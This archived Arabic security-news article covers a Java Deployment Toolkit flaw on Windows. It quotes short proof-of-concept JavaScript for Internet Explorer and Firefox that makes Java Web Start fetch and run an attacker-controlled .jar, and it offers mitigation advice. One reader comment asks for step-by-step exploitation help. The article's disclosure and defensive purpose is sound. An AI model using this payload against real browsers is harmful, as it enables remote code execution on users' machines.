أخبار الثغرات

ثغرة خطيرة في JAVA تهدد مستخدمي ويندوز

تم أرشفة هذا المحتوى


اكتشف أحد مهندسي Google ثغرة خطيرة في JAVA موجودة في جميع الاصدارات التي تم اطلاقها بعد Java 6 Update 10. بحسب مكتشف الثغرة Tavis Ormandy والذي قام بنشر تفاصيلها بشكل علني مستخدمي ويندوز بجميع اصداراته معرضين للاختراق عن طريق المتصفّح بغض النظر عن نوعه طالما جافا منصّبة بالجهاز.

Java

 

تعتبر هذه الثغرة شديدة الخطورة لأنها تعرض جميع اصدارات نظام ويندوز للاختراق عن طريق المتصفّح بكل سهولة وذلك عن طريق توجيه المستخدم لرابط يحتوي على كود يستغل خطأ في Java Deployment Toolkit التي تم اضافتها الى JAVA 6 Update 10 مما يسمح له بتمرير ملف .jar الى Java Web Start (وهي تقنيّة تسمح للمطورين بتشغيل برامجهم المبرمجة بلغة جافا من الانترنت عن طريق بروتوكول JNLP) وتشغيله على جهاز المستخدم.

استغلال هذه الثغرة لا يتعلّق بالمتصفّح حيث يمكن استغلالها على Internet Explorer و Firefox أيضاً في نظام ويندوز. أما أنظمة لينوكس وماك فعلى الأغلب أنها غير مصابة بهذه الثغرة.

 

كود الاستغلال في متصفّح Internet Explorer سيكون بالشكل:

var o = document.createElement(“OBJECT”);

o.classid = “clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA”;

o.launch(“http: -J-jar -J\attacker.controlledexploit.jar none”);

 

أما متصفّح Mozilla Firefox فالكود هو نفسه تقريباً:

var o = document.createElement(“OBJECT”);

o.type = “application/npruntime-scriptable-plugin;deploymenttoolkit”

document.body.appendChild(o);

o.launch(“http: -J-jar -J\attacker.controlledexploit.jar none”);

 

بسبب خطأ في طريقة معالجة الدالة launch للرابط الذي وضعه المهاجم, هذا مكّنه من حقن ملف .jar سيتم تمريره الى javaws التي بدورها ستقوم بتشغيله على النظام. مكتشف الثغرة كتب أنه أبلغ Sun قبل نشرها بشكل علني لكن رد الشركة أتى أن هذه الثغرة ليست خطيرة بما فيه الكفاية ليقوموا بكسر دورة التحديث الخاصة بجافا.

شخصيّاً أجد الثغرة خطيرة جداً لأن Java تعتبر من الأمور الأساسية وموجودة في أغلب الأنظمة والسبب الآخر هو طبيعة هذه الثغرة والثبات الكبير الذي عرفت به جافا! مع اضافة تقنيات جديدة من الطبيعي أن تكتشف ثغرات جديدة ومن مدة بسيطة شركة Oracle أطلقت تحديث لجافا لاصلاح 27 مشاكل أمنية فيها. كما أن هذه الثغرة لا تستغل خطأ في الذاكرة مثلاً أو تحقن شيل كود وبهذه الحالة لا يوجد مشاكل مع تقنيات الحماية مثل ASLR أو DEP لأن الاستغلال مختلف تماماً عن باقي ثغرات المتصفح المعروفة وملف .jar سيعمل على النظام دون أي مشاكل.

مكتشف الثغرة وضع بعض الحلول للحماية منها يمكنكم الاطلاع عليها من الرابط الموجود بالأسفل, شخصيّاً أرى أن الحل الأفضل (والأسهل) هو استخدام Firefox مع اضافة NoScript وبهذه الحالة ستكون قادر على التحكم بشكل كامل بالأمور والسكريبتات التي سيتم تشغيلها على متصفّحك وهذا كفيل لحمايتك من أغلب ثغرات المتصفح وليس هذه الثغرة فقط.

 

لمزيد من المعلومات: Full Disclosure mailing list

‫12 تعليقات

  1. During the last few years, the number of vulnerabilities being discovered in applications is far greater than the number of vulnerabilities discovered in operating systems. As a result, more exploitation attempts are recorded on application programs. The most “popular” applications for exploitation tend to change over time since the rationale for targeting a particular application often depends on factors like prevalence or the inability to effectively patch. Due to the current trend of converting trusted web sites into malicious servers, browsers and client-side applications that can be invoked by browsers seem to be consistently targeted.

  2. مشكور اخي عبدالمهيمن لكن اخي ياليت تشرط طريقة استغلال هذه الثغره في المتصفح Internet Explorer نريد الخطوات بصراحه لاني مبتدئ في هذا النوع من الاختراقات ياليت تطول بالك علينا بس وتتحملنا وفقك الله

اترك تعليقاً

لن يتم نشر عنوان بريدك الإلكتروني. الحقول الإلزامية مشار إليها بـ *

زر الذهاب إلى الأعلى